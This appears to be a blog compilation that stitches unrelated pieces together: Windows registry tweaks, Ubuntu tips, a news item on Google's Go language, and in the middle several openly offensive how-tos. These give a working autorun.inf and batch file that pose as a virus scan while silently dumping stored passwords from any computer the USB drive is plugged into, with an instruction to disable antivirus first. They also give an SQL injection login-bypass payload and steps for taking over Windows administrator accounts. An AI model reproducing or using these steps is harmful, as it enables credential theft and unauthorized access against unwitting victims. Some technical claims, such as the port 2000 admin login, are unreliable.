Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your computer.
So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again.

Protecting User Privacy at Logon Prompts

Normally, at the time of logging into a Windows system, it is possible to find out information on the last user since his/her details are stored in the cache memory. It is always a good security and privacy practice to prevent this information from being displayed by executing the following registry tweak:
1.Open the regedit. axe file.

2.Search for, or create, the following registry key: For Windows 2000 or XP:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/Current Version/Policies/System
For Windows 95,98 or Windows ME:
HKEY_LOCAL_MACHINE/Network/Logon
For Windows NT:
HKEY LOCAL –MACHINE/SOFTWARE/Microsoft/WindowsNT/Current Version/Winlogon

3.Create a new DWORD value (within the above registry key) called DontDisplayLastUserName and set its value to 1 to prevent the last username from displaying, and to 0 to implement the default settings.

4.Exit the Windows registry and restart the Windows session for the change to be applied.It is also possible to implement the above by simply creating and executing a.reg extension file containing the data below:
REGEDIT4
[Registry Key depending upon Windows version] "DontDisplayLastUserName "= "1"

Edit sysoc.inf to list all software

To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.
*Note* - use this at your own risk. Removing critical components of the system will make Windows instable.


Access Task Manager with shortcut

To access the Task Manager easier, you can make a shortcut that points to %windir%\system32\taskmgr.exe.


Stop treating ZIP files like Folders

If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll.


Rename multiple files in Windows at once

Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them.



Task kill feature in Windows

Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill
to end the specific task. This forces an instant closing of the task.

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.This article is not written by me..



MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

Step 1 – Search for them

Make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.

Step 2 – Scan them

Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.

Now just login using port 2000 ie -

http://www.website.com:2000
and you will be comfortably login into admin page like this -

Step 3 – Hack
Now in the fields,you have to type -

username – admin

password – a’ or 1=1 or ‘b

domain - a’ or 1=1 or ‘b

and press go,you will login into admin



That' all...you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take abt 20 seconds.Hope it is helpfull...

MeThod 1:


Accessing Unprotected Administrator Account


Steps Involved:
Step1: Start the Computer i.e Turn on the Computer.
Step2: Now wait till the username window appears

Step 3: As This Window Appears Press Ctrl+Alt +Delete (2 times)..
Step4: Now Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...
For Resetting password you can follow two Procedures..
Procedure 1: Goto Start-->Control Panel-->User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

METHOD 2:

HACKING ADMIN ACCOUNT USING NET USER COMMAND
Note: This will work only when user has access of user account or some how he has been allowed  or working in admin account.

Steps Involved:
Step1: Goto the Start and click on Run and Type cmd in it...
Step 2: Now type "net user" in the command prompt to obtain the All accounts on that computer..
Step 3: Now Select the account Which u want to Reset the Password...
Suppose that we want to Reset the Password  of Administrator...
Now Type "net user Administrator *  " Without quotes... and press Enter.
Step 4: Now after that press Enter Twice to rest the password. Now Next time u open that Account .. It will not require any Password..

You might have had experience with your ubuntu system hang up due to some applications (this happens sometimes with Firefox and some games).

You can actually login to one of your other terminals and stop the applications which is causing problems.

1. Use Alt + Ctrl and any function key F1 through F7. Where F7 is the default xwindows terminal.
2. Log in and then use the command "top" from the command line to find the process id (pid) of the frozen or run away application which is causing problems.

$ top

3. After finding the pid number, type

$ kill -kill PID (where PID is the process id of the application).


Now go back to terminal 7 with "Alt+Ctrl+F7" to find the troublesome application gone.

Services are programs (called daemons) that once started run continuously in the background and are ready for input or a changes in your computer and respond to them. For example the Apache server has a daemon called httpd (the d is for daemon) that listens on port 80 on your computer and when it receives a request for a page it sends the appropriate data back to the client machine.

Many services are required to run all the time however many can be safely turned off for both security reasons as running unnecessary services opens more doors into your computer, but also for performance reasons. It may not make much difference but your computer should boot slightly faster the less services it has to start on boot.

The scripts located in /etc/init.d are part of the bootup sequence of every Debian-like distro. Very often Ubuntu's documentation and guides have suggested - in order to deactivate init scripts - to change the permissions of the scripts in /etc/init.d, making them non-executable. This will have the following consequences:

* You'll get an error message at boot time (to avoid it you need to patch all the scripts);
* You are breaking the logical chain stated in debian-policy concerning runlevel configuration.

If the logic of a debian-like system boot up sequence is not very clear and familiar to you, you should not play with symlinks, permissions, etc. In order to avoid messing up your system, Boot-Up Manager will automate all of your configuration in a nice and clean graphical interface.

Installation:
Open up "Ubuntu Software Center" : Application >> Ubuntu Software Center and find for package "BootUp-Manager" and install it.

After successful installation go to : System >> Administration >> BootUp-Manager

Bootup-Manager got a very clean and simple interface through which you can start/stop or Disable the services in Ubuntu Linux System.

Today the search giant released Go, an open-source development language that Google believes will combine performance with speed, and one that the company probably hopes will reshape the development and software industries in its favor.

Go is based on the C programming family, one of the most widely used programming language trees in the world. However, the twist is that incorporates elements of Python (a preferred development language within Google) and the Pascal/Modula/Oberon family to make faster and more dynamic programs.

Why Did Google Make Its Own Language?


“No major systems language has emerged in over a decade, but over that time the computing landscape has changed tremendously. There are several trends:

- Computers are enormously quicker but software development is not faster.

- Dependency management is a big part of software development today but the “header files” of languages in the C tradition are antithetical to clean dependency analysis—and fast compilation.

- There is a growing rebellion against cumbersome type systems like those of Java and C++, pushing people towards dynamically typed languages such as Python and JavaScript.

- Some fundamental concepts such as garbage collection and parallel computation are not well supported by popular systems languages.

- The emergence of multi core computers has generated worry and confusion.”

Google believes that the web and computing have changed dramatically in the last ten years, but the languages powering that computing have not. But when you get down to it, Google could benefit a great deal from not only having a more efficient programming language, but having one it designed being used in thousands web and software apps.
